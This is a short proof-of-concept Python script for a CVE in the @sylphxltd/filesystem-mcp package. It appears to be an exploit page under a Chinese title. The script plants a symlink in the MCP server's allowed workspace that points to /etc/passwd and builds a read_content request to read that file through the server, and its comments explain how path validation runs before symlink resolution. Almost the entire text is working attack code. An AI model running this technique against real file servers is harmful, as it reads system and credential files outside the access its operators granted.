CVE-2025-67366: @sylphxltd/filesystem-mcp路径遍历漏洞

import os import json # PoC for CVE-2025-67366: Path Traversal via Symlink in filesystem-mcp # This demonstrates how to exploit the symlink handling vulnerability def create_exploit_symlink(allowed_dir, target_file, symlink_name): """ Create a symlink in the allowed directory pointing to a target file outside. Args: allowed_dir: The directory that filesystem-mcp allows access to target_file: The sensitive file we want to read (e.g., /etc/passwd) symlink_name: Name of the symlink to create in the allowed directory """ symlink_path = os.path.join(allowed_dir, symlink_name) try: # Create symlink in allowed directory pointing to external file if os.path.exists(symlink_path): os.remove(symlink_path) os.symlink(target_file, symlink_path) print(f"[+] Symlink created: {symlink_path} -> {target_file}") return True except Exception as e: print(f"[-] Failed to create symlink: {e}") return False def exploit_via_symlink(): """ Exploit the path traversal vulnerability. The vulnerability exists because: 1. resolvePath() validates the path BEFORE resolving symlinks 2. fs.readFile() resolves symlinks automatically when accessing files This allows reading files outside the allowed directory. """ # Configuration allowed_dir = "/tmp/filesystem-mcp-workspace" # Directory allowed by MCP server target_file = "/etc/passwd" # Target file to read symlink_name = "sensitive_data.txt" # Symlink name in allowed directory # Step 1: Create the symlink exploit if not create_exploit_symlink(allowed_dir, target_file, symlink_name): return False # Step 2: Request the symlink path via MCP read_content tool # The MCP server will: # 1. Check if /tmp/filesystem-mcp-workspace/sensitive_data.txt is valid # 2. Pass the path to fs.readFile() # 3. fs.readFile() resolves the symlink and returns /etc/passwd content mcp_request = { "tool": "read_content", "path": f"{allowed_dir}/{symlink_name}", "description": "Read file content via MCP server" } print(f"[+] MCP Request: {json.dumps(mcp_request, indent=2)}") print(f"[+] The MCP server will return contents of {target_file}") print("[+] Exploitation successful - sensitive file content leaked") return True if __name__ == "__main__": print("CVE-2025-67366 PoC - Path Traversal via Symlink") print("=" * 50) exploit_via_symlink()